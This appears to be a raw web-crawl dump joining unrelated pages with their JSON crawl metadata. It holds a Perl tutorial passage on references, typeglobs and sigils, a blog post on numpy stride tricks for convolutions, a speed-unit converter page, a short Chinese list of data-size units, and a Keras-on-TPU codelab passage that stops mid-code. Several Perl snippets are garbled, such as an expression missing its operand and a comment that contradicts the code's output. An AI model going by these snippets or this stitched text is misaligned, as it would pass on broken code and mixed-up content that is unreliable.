\\$matrix;\n``````\n\nWhen used as Boolean, references are always true.\n\n## Hash References\n\nHash references are scalars which contain a pointer to the memory location containing the data of a hash. Because the scalar points directly to the hash itself, when it is passed to a subroutine, changes made to the hash are not local to the subroutine as with a regular hash, but instead are global.\n\nFirst, let's examine what happens when you pass a normal hash to a subroutine and modify it within there:\n\n``````use strict;\nuse warnings;\nuse Data::Dumper;\n\nsub modify\n{\nmy %hash = @_;\n\n\\$hash{new_value} = 2;\n\nprint Dumper(\"Within the subroutine\");\nprint Dumper(\\%hash);\n\nreturn;\n}\n\nmy %example_hash = (\nold_value => 1,\n);\n\nmodify(%example_hash);\n\nprint Dumper(\"After exiting the subroutine\");\nprint Dumper(\\%example_hash);\n``````\n\nWhich results in:\n\n``````\\$VAR1 = 'Within the subroutine';\n\\$VAR1 = {\n'new_value' => 2,\n'old_value' => 1\n};\n\\$VAR1 = 'After exiting the subroutine';\n\\$VAR1 = {\n'old_value' => 1\n};\n``````\n\nNotice that after we exit the subroutine, the hash remains unaltered; all changes to it were local to the modify subroutine, because we passed a copy of the hash, not the hash itself.\n\nIn comparison, when you pass a hashref, you are passing the address to the original hash, so any changes made within the subroutine will be made to the original hash:\n\n``````use strict;\nuse warnings;\nuse Data::Dumper;\n\nsub modify\n{\nmy \\$hashref = shift;\n\n# De-reference the hash to add a new value\n\\$hashref->{new_value} = 2;\n\nprint Dumper(\"Within the subroutine\");\nprint Dumper(\\$hashref);\n\nreturn;\n}\n\n# Create a hashref\nmy \\$example_ref = {\nold_value => 1,\n};\n\n# Pass a hashref to a subroutine\nmodify(\\$example_ref);\n\nprint Dumper(\"After exiting the subroutine\");\nprint Dumper(\\$example_ref);\n``````\n\nThis will result in:\n\n``````\\$VAR1 = 'Within the subroutine';\n\\$VAR1 = {\n'new_value' => 2,\n'old_value' => 1\n};\n\\$VAR1 = 'After exiting the subroutine';\n\\$VAR1 = {\n'new_value' => 2,\n'old_value' => 1\n};\n``````\n\n## Typeglobs, typeglob refs, filehandles and constants\n\nA typeglob `*foo` holds references to the contents of global variables with that name: `\\$foo`, `@foo`, `\\$foo`, `&foo`, etc. You can access it like an hash and assign to manipulate the symbol tables directly (evil!).\n\n``````use v5.10; # necessary for say\nour \\$foo = \"foo\";\nour \\$bar;\nsay ref *foo{SCALAR}; # SCALAR\nsay \\${ *foo{SCALAR} }; # bar\n*bar = *foo;\nsay \\$bar; # bar\n\\$bar = 'egg';\nsay \\$foo; # egg\n``````\n\nTypeglobs are more commonly handled when dealing with files. `open`, for example, produces a reference to a typeglob when asked to create a non-global filehandle:\n\n``````use v5.10; # necessary for say\nopen(my \\$log, '> utf-8', '/tmp/log') or die \\$!; # open for writing with encoding\nsay \\$log 'Log opened';\n\n# You can dereference this globref, but it's not very useful.\nsay ref \\$log; # GLOB\nsay (*{\\$log}->{IO} // 'undef'); # undef\n\nclose \\$log or die \\$!;\n``````\n\nTypeglobs can also be used to make global read-only variables, though `use constant` is in broader use.\n\n``````# Global constant creation\n*TRUE = \\('1');\nour \\$TRUE;\nsay \\$TRUE; # 1\n\\$TRUE = ''; # dies, \"Modification of a read-only value attempted\"\n\n# use constant instead defines a parameterless function, therefore it's not global,\n# can be used without sigils, can be imported, but does not interpolate easily.\nuse constant (FALSE => 0);\nsay FALSE; # 0\nsay &FALSE; # 0\nsay \"\\${\\FALSE}\"; # 0 (ugh)\nsay *FALSE{CODE}; # CODE(0xMA1DBABE)\n\n# Of course, neither is truly constant when you can manipulate the symbol table...\n*TRUE = \\('');\nuse constant (EVIL => 1);\n*FALSE = *EVIL;\n``````\n\n## Sigils\n\nPerl has a number of sigils:\n\n``````\\$scalar = 1; # individual value\n@array = ( 1, 2, 3, 4, 5 ); # sequence of values\n%hash = ('it', 'ciao', 'en', 'hello', 'fr', 'salut'); # unordered key-value pairs\n&function('arguments'); # subroutine\n*typeglob; # symbol table entry\n``````\n\nThese look like sigils, but aren't:\n\n``````\\@array; # \\ returns the reference of what's on the right (so, a reference to @array)\n\\$#array; # this is the index of the last element of @array\n``````\n\nYou can use braces after the sigil if you should be so inclined. Occasionally, this improves readability.\n\n``````say \\${value} = 5;\n``````\n\nWhile you use different sigils to define variables of different types, the same variable can be accessed in different ways based on what sigils you use.\n\n``````%hash; # we use % because we are looking at an entire hash\n\\$hash{it}; # we want a single value, however, that's singular, so we use \\$\n\\$array; # likewise for an array. notice the change in brackets.\n@array[0,3]; # we want multiple values of an array, so we instead use @\n@hash{'it','en'}; # similarly for hashes (this gives the values: 'ciao', 'hello')\n%hash{'it','fr'}; # we want an hash with just some of the keys, so we use %\n# (this gives key-value pairs: 'it', 'ciao', 'fr', 'salut')\n``````\n\nThis is especially true of references. In order to use a referenced value you can combine sigils together.\n\n``````my @array = 1..5; # This is an array\nmy \\$reference_to_an_array = \\@array; # A reference to an array is a singular value\npush @array, 6; # push expects an array\npush @\\$reference_to_an_array, 7; # the @ sigil means what's on the right is an array\n# and what's on the right is \\$reference_to_an_array\n# hence: first a @, then a \\$\n``````\n\nHere's a perhaps less confusing way to think about it. As we saw earlier, you can use braces to wrap what's on the right of a sigil. So you can think of `@{}` as something that takes an array reference and gives you the referenced array.\n\n``````# pop does not like array references\npop \\$reference_to_an_array; # ERROR in Perl 5.20+\n# but if we use @{}, then...\npop @{ \\$reference_to_an_array }; # this works!\n``````\n\nAs it turns out, `@{}` actually accepts an expression:\n\n``````my \\$values = undef;\nsay pop @{ \\$values }; # ERROR: can't use undef as an array reference\nsay pop @{ \\$values // } # undef // gives , so this prints 5\n``````\n\n...and the same trick works for other sigils, too.\n\n``````# This is not an example of good Perl. It is merely a demonstration of this language feature\nmy \\$hashref = undef;\nfor my \\$key ( %{ \\$hashref // {} } ) {\n\"This doesn't crash\";\n}\n``````\n\n...but if the \"argument\" to a sigil is simple, you can leave the braces away.\n\n``````say \\$\\$scalar_reference;\nsay pop @\\$array_reference;\nfor keys (%\\$hash_reference) { ... };\n``````\n\nThings can get excessively extravagant. This works, but please Perl responsibly.\n\n``````my %hash = (it => 'ciao', en => 'hi', fr => 'salut');\nmy \\$reference = \\%hash;\nmy \\$reference_to_a_reference = \\\\$reference;\n\nmy \\$italian = \\$hash{it}; # Direct access\nmy @greets = @\\$reference{'it', 'en'}; # Dereference, then access as array\nmy %subhash = %\\$\\$reference_to_a_reference{'en', 'fr'} # Dereference ×2 then access as hash\n``````\n\nFor most normal use, you can just use subroutine names without a sigil. (Variables without a sigil are typically called \"barewords\".) The `&` sigil is only useful in a limited number of cases.\n\n• Making a reference to a subroutine:\n\n``````sub many_bars { 'bar' x \\$_ }\nmy \\$reference = \\&many_bars;\nsay \\$reference->(3); # barbarbar\n``````\n• Calling a function ignoring its prototype.\n\n• Combined with goto, as a slightly weird function call that has the current call frame replaced with the caller. Think the linux `exec()` API call, but for functions." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7386265,"math_prob":0.54935396,"size":18250,"snap":"2021-04-2021-17","text_gpt3_token_len":5070,"char_repetition_ratio":0.12627426,"word_repetition_ratio":0.03949447,"special_character_ratio":0.31375343,"punctuation_ratio":0.17363253,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9633976,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-18T12:28:30Z\",\"WARC-Record-ID\":\"<urn:uuid:6cfcedf1-77dd-4c90-b27a-b60a0fa46286>\",\"Content-Length\":\"57233\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:46a87d24-4bd5-43fb-9ad3-7603590f128e>\",\"WARC-Concurrent-To\":\"<urn:uuid:f1141cd1-9edd-418a-a9a9-929e23d1676a>\",\"WARC-IP-Address\":\"172.67.206.98\",\"WARC-Target-URI\":\"https://sodocumentation.net/perl/topic/1566/variables\",\"WARC-Payload-Digest\":\"sha1:FY4FLKTSGAK6DX2NCLQABGWBB5LYRP2W\",\"WARC-Block-Digest\":\"sha1:6V5GPTQZDJOSWNPRC7IEC5YZEVRVAKKY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038476606.60_warc_CC-MAIN-20210418103545-20210418133545-00442.warc.gz\"}"}
https://jessicastringham.net/2017/12/31/stride-tricks/
[ "", null, "For an assignment on convolutional neural networks for deep learning practical, I needed to implement somewhat efficient convolutions. I learned about `numpy.stride_tricks` and `numpy.einsum` in the process and wanted to share it!\n\n• Part 1 is an introduction to the problem and how I used `numpy.lib.stride_tricks.as_strided`.\n• Part 2 is about `numpy.einsum`.\n\n## Introduction\n\nThe assignment was to classify handwritten characters using convolutional neural networks. For pedagogical reasons, I needed to implement convolutions.\n\nWe used the EMNIST dataset. Below is a sample of 40 example images from the dataset.", null, "The image below shows what happens when kernels are applied (convolved). The first row shows examples. The five bottom rows are the results of convolving each of five kernels, also known as the feature maps.", null, "Convolutional neural nets are pretty cool, but that’s all I’ll say about convolutional neural networks for now. For more information, check out cs231n.\n\n### Convolutions\n\nThe code I’m going to do in this series basically does the following (fyi: if you saw this earlier, I’ve edited it):\n\nThere are a couple details on how kernels and inputs are flipped or padded (convolutions vs cross-correlations; forward propagation vs back propagation; dealing with edges), but I’ll assume inputs and kernel are already set up.\n\n### Kernels\n\nKernels have parameters describing how to weight each pixel. For example, below is a `3 x 3` kernel with 9 parameters:", null, "If my input was a `3 x 3` grayscale image, I could think of putting this kernel on top of the image and multiplying each kernel parameter by the corresponding input pixel value. The resulting feature map would be a single pixel containing the sum of all pixels.\n\nFor a larger image, convolutions are done by sliding the kernel over the image to create the feature map. Here’s the canonical image:", null, "Victor Powell’s post helped me understand image kernels.\n\n## Stride tricks\n\nA tricky part is telling `numpy` to slide the kernel across the inputs. One approach could be using the nested for-loops above, and classmates did have luck using for-loops with Numba. I wanted to see if I could do it with `numpy` and came across `as_strided`.\n\n`as_strided` tricks numpy into looking at the array data in memory in a new way.\n\nTo use `as_strided` in convolutions, I used `as_strided` to add two more dimensions the size of the kernel. I also reduced the first two dimensions so that they were the size of the resulting feature map. To use `as_strided` two additional arguments are needed: the shape of the resulting array and the strides to use.\n\n(An aside, these high-dimensional matrices is called a tensor, as in TensorFlow.)\n\n### Shape\n\nThe way I think of this particular 4D tensor is a spreadsheet where each cell contains a little kernel-sized spreadsheet. If I looked at one cell of the outer spreadsheet, the kernel-sized spreadsheet should be the values that I multiply and sum with the kernel parameters to get the corresponding value in the feature map.\n\nOr, in an image", null, "By getting it into this form, I can use other functions to multiply and sum across dimensions.\n\n### Strides\n\nOne way to understand it is to imagine how a computer might store a 2D array in memory.\n\nFor a program to represent a 2D array, it fakes it. In the gif below, the left shows the faked array and the right shows an imagined memory representation. Moving left and right moves left or right, but moving up or down has to jump forward by the width.", null, "This is where `.strides` comes in handy. For example, when the array goes to print the next element to the right, I can tell it to jump forward as if it was moving down. If I do this correctly, I can produce the results above. That said, figuring out the strides parameter is one of the trickiest parts.\n\n#### Code\n\nPhew. Here’s some example code that does this:", null, "Next time, I’ll show how to use this to compute the feature map.\n\n### Final note: “This function has to be used with extreme care”\n\nAs the `as_strided` documentation says, “This function has to be used with extreme care”. I felt fine experimenting with it, because the code was not for production, and I had an idea of memory layouts. But I still messed up and it was interesting.\n\nAfter implementing convolutions, I decided to use `as_strided` to broadcast the bias term. However I forgot to update a variable, and it expanded a tiny test array into a much-too-large matrix. That resulted in it pulling garbage numbers out of other parts of memory! It would randomly add things like (10^300) to my convolutions!\n\nOne thing I’m learning in machine learning is that when things are horribly broken, they can still seem to work but with a tiny bit lower performance than expected. This was one of those cases.\n\nI didn’t realize something bad was happening and thought it was just that CNN’s are harder to train. I ended up getting it to train with a sigmoid non-linearity, with okay but not great performance.\n\nFor fun, here’s what the filters looked like:", null, "" ]
[ null, "https://jessicastringham.net/assets/2017-12-31-strided.gif", null, "https://jessicastringham.net/assets/2017-12-31-eminst.png", null, "https://jessicastringham.net/assets/2017-12-31-filters.png", null, "https://jessicastringham.net/assets/2017-12-31-params.png", null, "https://jessicastringham.net/assets/2017-12-31-convolution.gif", null, "https://jessicastringham.net/assets/2017-12-31-strided.gif", null, "https://jessicastringham.net/assets/2017-12-31-strided-intro.gif", null, "https://jessicastringham.net/assets/2017-12-31-result.png", null, "https://jessicastringham.net/assets/2017-12-31-bad-filters.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8931598,"math_prob":0.7502433,"size":5263,"snap":"2021-31-2021-39","text_gpt3_token_len":1196,"char_repetition_ratio":0.10952652,"word_repetition_ratio":0.015572859,"special_character_ratio":0.21356641,"punctuation_ratio":0.11619048,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9861038,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,6,null,3,null,3,null,5,null,3,null,6,null,3,null,5,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-20T08:45:19Z\",\"WARC-Record-ID\":\"<urn:uuid:6dcc0c2b-90fd-4d52-9040-8ee8135ef814>\",\"Content-Length\":\"18049\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b65438aa-606f-4402-9c99-6c9fb39cc455>\",\"WARC-Concurrent-To\":\"<urn:uuid:c494b91d-9fb5-43a1-811e-464af1f0d0bd>\",\"WARC-IP-Address\":\"208.113.160.68\",\"WARC-Target-URI\":\"https://jessicastringham.net/2017/12/31/stride-tricks/\",\"WARC-Payload-Digest\":\"sha1:OCMF2H74WMGDD5IJICXXXQNC662SG75N\",\"WARC-Block-Digest\":\"sha1:NYUTSBU2LW4VHWBYCRAJGXVHAGTIIFLM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057033.33_warc_CC-MAIN-20210920070754-20210920100754-00352.warc.gz\"}"}
https://calcresource.com/conv-mph-ftps.html
[ "## Mph - ft/s Converter\n\nEnter the speed in either of the next two fields and get it converted instantly!\n\n Miles per hour [mph]: Feet per second [ft/s]:\n\n## Definitions\n\n### Miles per hour\n\nMile per hour is a unit of speed defined in the Imperial and US customary systems of units. It measures the number of miles an object travels within an hour. International mile [mi] is a unit of length, equal to 5280 feet and precisely defined as 1609.344 meters. The symbol more commonly used on signs and labels is the abbreviation mph, however in science and engineering contexts, mi/h may be more convenient for unit arithmetic.\n\nThe relationships between the miles per hour and some other speed units, native to the Imperial/US customary and SI systems, are shown in the following table:\n\n### Feet per second\n\nFoot per second is a unit of speed defined in the Imperial and US customary systems of units. It measures the number of feet an object travels within a second. Foot [ft] is a unit of length, precisely defined as equal to 0.3048 meters.\n\nThe relationships between the foot per second and some other speed units, native to the Imperial/US customary and SI systems, are shown in the following table:\n\n### How to convert miles per hour to feet per second\n\n• Multiply speed in mph with 5280\n• Divide the result by 3600\n• The result is the speed in feet per second\n\nFor example 60 mph is: 60x5280/3600 = 88 fps\n\n### How to convert feet per second to miles per hour\n\n• Multiply speed in fps with 3600\n• Divide the result by 5280\n• The result is the speed in mph\n\nFor example 99 fps is: 99*3600/5280 = 67.5 mph\n\n### Conversion table from [mph] to [fps]\n\nIn the following table some typical speeds in miles per hour are converted to feet per second:\n\n### Conversion table from [fps] to [mph]\n\nIn the following table some typical speeds in feet per second are converted to miles per hour:" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.73253924,"math_prob":0.9406977,"size":2689,"snap":"2023-14-2023-23","text_gpt3_token_len":941,"char_repetition_ratio":0.15791434,"word_repetition_ratio":0.28333333,"special_character_ratio":0.38229826,"punctuation_ratio":0.101200685,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9915401,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-01T05:59:54Z\",\"WARC-Record-ID\":\"<urn:uuid:e8f7d4e9-d188-428d-b4a8-5e387b92e4a7>\",\"Content-Length\":\"76429\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b09fd9a9-b72a-49d5-af32-291a34a1420c>\",\"WARC-Concurrent-To\":\"<urn:uuid:cf73a55d-24bf-4ba4-9668-41e97cee7fdc>\",\"WARC-IP-Address\":\"165.227.124.9\",\"WARC-Target-URI\":\"https://calcresource.com/conv-mph-ftps.html\",\"WARC-Payload-Digest\":\"sha1:YZYBGEDRPJFV7FBHX633EOF4IWL573F7\",\"WARC-Block-Digest\":\"sha1:SDEIIVYP6L4KOVIXG2ZSPKDKJANFJR7D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224647614.56_warc_CC-MAIN-20230601042457-20230601072457-00240.warc.gz\"}"}
https://www.haogeee.com/article/a13/84.html
[ "", null, "5V特点:大量、高速、多样、价值、真实性\n\n1 Byte =8 bit\n\n1 KB = 1,024 Bytes = 8192 bit\n\n1 MB = 1,024 KB = 1,048,576 Bytes\n\n1 GB = 1,024 MB = 1,048,576 KB\n\n1 TB = 1,024 GB = 1,048,576 MB\n\n1 PB = 1,024 TB = 1,048,576 GB\n\n1 EB = 1,024 PB = 1,048,576 TB\n\n1 ZB = 1,024 EB = 1,048,576 PB\n\n1 YB = 1,024 ZB = 1,048,576 EB\n\n1 BB = 1,024 YB = 1,048,576 ZB\n\n1 NB = 1,024 BB = 1,048,576 YB\n\n1 DB = 1,024 NB = 1,048,576 BB\n\n1 Bit(比特) =Binary Digit\n\n8 Bits = 1 Byte(字节)\n\n1,000 Bytes = 1 Kilobyte\n\n1,000 Kilobytes = 1 Megabyte\n\n1,000 Megabytes = 1 Gigabyte\n\n1,000 Gigabytes = 1Terabyte\n\n1,000 Terabytes = 1 Petabyte\n\n1,000 Petabytes = 1 Exabyte\n\n1,000Exabytes = 1 Zettabyte\n\n1,000 Zettabytes = 1 Yottabyte\n\n1,000 Yottabytes = 1Brontobyte\n\n1,000 Brontobytes = 1 Geopbyte\n\n(1)对大量消费者提供产品或服务的企业可以利用大数据进行精准营销;\n\n(2)做小而美模式的中小微企业可以利用大数据做服务转型;\n\n(3)面临互联网压力之下必须转型的传统企业需要与时俱进充分利用大数据的价值。" ]
[ null, "https://www.haogeee.com/uploads/allimg/20200727/1-200HG2535S20.jpg", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.89999074,"math_prob":0.9999883,"size":1978,"snap":"2021-43-2021-49","text_gpt3_token_len":1531,"char_repetition_ratio":0.17882472,"word_repetition_ratio":0.0,"special_character_ratio":0.32709807,"punctuation_ratio":0.12569833,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97036326,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-16T14:54:00Z\",\"WARC-Record-ID\":\"<urn:uuid:c548ee44-fb4d-47f2-9735-c578ed645f29>\",\"Content-Length\":\"24086\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0ae877dc-d8c7-447a-8847-854af0c4e410>\",\"WARC-Concurrent-To\":\"<urn:uuid:dd034d62-2dab-4bc7-bb95-f8cb756e4987>\",\"WARC-IP-Address\":\"150.138.249.223\",\"WARC-Target-URI\":\"https://www.haogeee.com/article/a13/84.html\",\"WARC-Payload-Digest\":\"sha1:P54XCNK4YEKD3LH7R4VM27O7MHWW7K4O\",\"WARC-Block-Digest\":\"sha1:XG2WO4YE3HDY4U4EPYTOLMGZWHUGR7BZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323584886.5_warc_CC-MAIN-20211016135542-20211016165542-00409.warc.gz\"}"}
https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/index.html?index=..%2F..index
[ "In this lab, you will learn about modern convolutional architecture and use your knowledge to implement a simple but effective convnet called \"squeezenet\".\n\nThis lab includes the necessary theoretical explanations about convolutional neural networks and is a good starting point for developers learning about deep learning.\n\nThis lab is Part 4 of the \"Keras on TPU\" series. You can do them in the following order or independently.", null, "### What you'll learn\n\n• To master the Keras functional style\n• To build a squeezenet architecture\n• To use TPUs in order to train fast and iterate on your architecture.\n\n### Feedback\n\nIf you see something amiss in this code lab, please tell us. Feedback can be provided through GitHub issues [feedback link].\n\nThis lab uses Google Collaboratory and requires no setup on your part. You can run it from a Chromebook. You can open this sample notebook and run through a couple of cells to familiarize yourself with Colaboratory.", null, "`Welcome to Colab.ipynb`\n\n## Select a TPU backend", null, "In the Colab menu, select Runtime > Change runtime type and then select TPU. In this code lab you will use a powerful TPU (Tensor Processing Unit) backed for hardware-accelerated training. Connection to the runtime will happen automatically on first execution, or you can use the \"Connect\" button in the upper-right corner.\n\n## Notebook execution", null, "Execute cells one at a time by clicking on a cell and using Shift-ENTER. You can also run the entire notebook with Runtime > Run all\n\n## Authentication", null, "Most code lab notebooks will ask you to authenticate with your Google account on first execution. This allows the Colab backend to access any cloud resources where logged-in access is necessary. Watch out for the prompt in \"Colab auth\" cells.", null, "All notebooks have a table of contents. You can open it using the black arrow on the left.\n\n## Hidden cells", null, "Some cells will only show their title. This is a Colab-specific notebook feature. You can double click on them to see the code inside but it is usually not very interesting. Typically support or visualization functions. You still need to run these cells for the functions inside to be defined.\n\n## In a nutshell", null, "The code for training a model on TPU in Keras is:\n\n``````tpu = tf.contrib.cluster_resolver.TPUClusterResolver(TPU_ADDRESS)\nstrategy = tf.contrib.tpu.TPUDistributionStrategy(tpu)\ntpu_model = tf.contrib.tpu.keras_to_tpu_model(model, strategy=strategy)\n\ntpu_model.fit(get_training_dataset,\nsteps_per_epoch=TRAIN_STEPS, epochs=EPOCHS,\nvalidation_data=get_validation_dataset, validation_steps=VALID_STEPS)``````\n\nWe will use TPUs today to build and optimize a flower classifier at interactive speeds (minutes per training run).", null, "## Why TPUs ?\n\nModern GPUs are organized around programmable \"cores\", a very flexible architecture that allows them to handle a variety of tasks such as 3D rendering, deep learning, physical simulations, etc.. TPUs on the other hand pair a classic vector processor with a dedicated matrix multiply unit and excel at any task where large matrix multiplications dominate, such as neural networks.", null, "Illustration: a dense neural network layer as a matrix multiplication, with a batch of eight images processed through the neural network at once. Please run through one line x column multiplication to verify that it is indeed doing a weighted sum of all the pixels values of an image. Convolutional layers can be represented as matrix multiplications too although it's a bit more complicated (explanation here, in section 1).\n\n## The hardware\n\n### MXU and VPU\n\nA TPU v2 core is made of a Matrix Multiply Unit (MXU) which runs matrix multiplications and a Vector Processing Unit (VPU) for all other tasks such as activations, softmax, etc. The VPU handles float32 and int32 computations. The MXU on the other hand operates in a mixed precision 16-32 bit floating point format.\n\n### Mixed precision floating point and bfloat16\n\nThe MXU computes matrix multiplications using bfloat16 inputs and float32 outputs. Intermediate accumulations are performed in float32 precision.", null, "Neural network training is typically resistant to the noise introduced by a reduced floating point precision. There are cases where noise even helps the optimizer converge. 16-bit floating point precision has traditionally been used to accelerate computations but float16 and float32 formats have very different ranges. Reducing the precision from float32 to float16 usually results in over and underflows. Solutions exist but additional work is typically required to make float16 work.\n\nThat is why Google introduced the bfloat16 format in TPUs. bfloat16 is a truncated float32 with exactly the same exponent bits and range as float32. This, added to the fact that TPUs compute matrix multiplications in mixed precision with bfloat16 inputs but float32 outputs, means that, typically, no code changes are necessary to benefit from the performance gains of reduced precision.\n\n### Systolic array\n\nThe MXU implements matrix multiplications in hardware using a so-called \"systolic array\" architecture in which data elements flow through an array of hardware computation units. (In medicine, \"systolic\" refers to heart contractions and blood flow, here to the flow of data.)\n\nThe basic element of a matrix multiplication is a dot product between a line from one matrix and a column from the other matrix (see illustration at the top of this section). For a matrix multiplication Y=X*W, one element of the result would be:\n\n`Y[2,0] = X[2,0]*W[0,0] + X[2,1]*W[1,0] + X[2,2]*W[2,0] + ... + X[2,n]*W[n,0]`\n\nOn a GPU, one would program this dot product into a GPU \"core\" and then execute it on as many \"cores\" as are available in parallel to try and compute every value of the resulting matrix at once. If the resulting matrix is 128x128 large, that would require 128x128=16K \"cores\" to be available which is typically not possible. The largest GPUs have around 4000 cores. A TPU on the other hand uses the bare minimum of hardware for the compute units in the MXU: just `bfloat16 x bfloat16 => float32` multiply-accumulators, nothing else. These are so small that a TPU can implement 16K of them in a 128x128 MXU and process this matrix multiplication in one go.", null, "Illustration: the MXU systolic array. The compute elements are multiply-accumulators. The values of one matrix are loaded into the array (red dots). Values of the other matrix flow through the array (grey dots). Vertical lines propagate the values up. Horizontal lines propagate partial sums. It is left as an exercise to the user to verify that as the data flows through the array, you get the result of the matrix multiplication coming out of the right side.\n\nIn addition to that, while the dot products are being computed in an MXU, intermediate sums just flow between adjacent compute units. They do not need to be stored and retrieved to/from memory or even a register file. The end result is that the TPU systolic array architecture has a significant density and power advantage, as well as a non-negligible speed advantage over a GPU, when computing matrix multiplications.\n\n### Cloud TPU\n\nWhen you request one \"Cloud TPU v2\" on Google Cloud Platform, you get a virtual machine (VM) which has a PCI-attached TPU board. The TPU board has four dual-core TPU chips. Each TPU core features a VPU (Vector Processing Unit) and a 128x128 MXU (MatriX multiply Unit). This \"Cloud TPU\" is then usually connected through the network to the VM that requested it. So the full picture looks like this:", null, "Illustration: your VM with a network-attached \"Cloud TPU\" accelerator. \"The Cloud TPU\" itself is made of a VM with a PCI-attached TPU board with four dual-core TPU chips on it.\n\n### TPU pods\n\nIn Google's data centers, TPUs are connected to a high-performance computing (HPC) interconnect which can make them appear as one very large accelerator. Google calls them pods and they can encompass up to 512 TPU v2 cores. TPU v3 pods are even more powerful.", null, "Illustration: a TPU v3 pod. TPU boards and racks connected through HPC interconnect.\n\nDuring training, gradients are exchanged between TPU cores using the all-reduce algorithm (good explanation of all-reduce here). The model being trained can take advantage of the hardware by training on large batch sizes.", null, "Illustration: synchronization of gradients during training using the all-reduce algorithm on Google TPU's 2-D toroidal mesh HPC network.\n\n## The software\n\n### Large batch size training\n\nThe ideal batch size for TPUs is 128 data items per TPU core but the hardware can already show good utilization from 8 data items per TPU core. Remember that one Cloud TPU has 8 cores.\n\nIn this code lab, we will be using the Keras API. In Keras, the batch size automatically becomes the per-core batch size when running on TPU. It is not something you need to adjust in your code, but under the hood, you will be training with an 8 times larger batch size.", null, "For additional performance tips see the TPU Performance Guide. For very large batch sizes, special care might be needed in some models, see LARSOptimizer for more details.\n\n### Under the hood: XLA\n\nTensorflow programs define computation graphs. The TPU does not directly run Python code, it runs the computation graph defined by your Tensorflow program. Under the hood, a compiler called XLA (accelerated Linear Algebra compiler) transforms the Tensorflow graph of computation nodes into TPU machine code. This compiler also performs many advanced optimizations on your code and your memory layout. The compilation happens automatically as work is sent to the TPU. You do not have to include XLA in your build chain explicitly.", null, "Illustration: to run on TPU, the computation graph defined by your Tensorflow program is first translated to an XLA (accelerated Linear Algebra compiler) representation, then compiled by XLA into TPU machine code.\n\n### Using TPUs in Keras\n\nTPUs are supported through the Keras API as of Tensorflow 1.12. Keras support is limited to 8 cores or one Cloud TPU for now. Here is an example:\n\n``````tpu = tf.contrib.cluster_resolver.TPUClusterResolver(TPU_ADDRESS)\nstrategy = tf.contrib.tpu.TPUDistributionStrategy(tpu)\ntpu_model = tf.contrib.tpu.keras_to_tpu_model(model, strategy=strategy)\n\ntpu_model.fit(get_training_dataset,\nsteps_per_epoch=TRAIN_STEPS, epochs=EPOCHS,\nvalidation_data=get_validation_dataset, validation_steps=VALID_STEPS)``````\n\nIn this code snippet:\n\n• `TPUClusterResolver` finds the TPU on the network. The TPU_ADDRESS argument can be empty (None) on all Google Cloud systems (ML Engine, Kubernetes Engine, Deep Learning VMs). These systems know where their TPU is. In Colaboratory you have to get the TPU address from an environment variable and pass it here yourself - code sample here.\n• `TPUDistributionStrategy` is the part that implements the distribution and the \"all-reduce\" gradient synchronization algorithm.\n• `keras_to_tpu_model` creates a copy of your model ready to train and predict on TPU\n• Please note that the `tpu_model.fit` function expects data inputs as a function that returns a `tf.data.Dataset`, for both the training and validation datasets.\n\n• While there are many ways to load data in a Tensorflow model, for TPUs, the use of the `tf.data.Dataset` API is required.\n• TPUs work best with fixed batch sizes. Please use `tf.data.Dataset.batch(drop_remainder=True)`.\n• Some Tensorflow operations are not supported. The list is here. The good news is that this limitation only applies to training code i.e. the forward and backward pass through your model. You can still use all Tensorflow operations in your data input pipeline as it will be executed on CPU.\n• int8 or int16 numbers are treated as int32. The TPU does not have integer hardware operating on less than 32 bits.\n• `tf.py_func` is not supported on TPU.\n• TPUs are very fast and ingesting data often becomes the bottleneck when running on them. There are tools you can use to detect data bottlenecks and other performance tips in the TPU Performance Guide.\n\n### Using TPUs with Estimator API\n\nPorting an `Estimator` model to the `TPUEstimator` API is more involved but also allows additional flexibility and enables support for TPU pods. The documentation describing the process is here and you can find a commented before/after TPUEstimator porting example here:\n\n•", null, "`TPUEstimator model (MNIST)`\n•", null, "`Original Estimator model for reference`\n\n## In a nutshell\n\nIf all the terms in bold in the next paragraph are already known to you, you can move to the next exercise. If your are just starting in deep learning then welcome, and please read on.\n\nFor models built as a sequence of layers Keras offers the Sequential API. For example, an image classifier using three dense layers can be written in Keras as:\n\n``````model = tf.keras.Sequential([\ntf.keras.layers.Flatten(input_shape=[192, 192, 3]),\ntf.keras.layers.Dense(500, activation=\"relu\"),\ntf.keras.layers.Dense(50, activation=\"relu\"),\ntf.keras.layers.Dense(5, activation='softmax') # classifying into 5 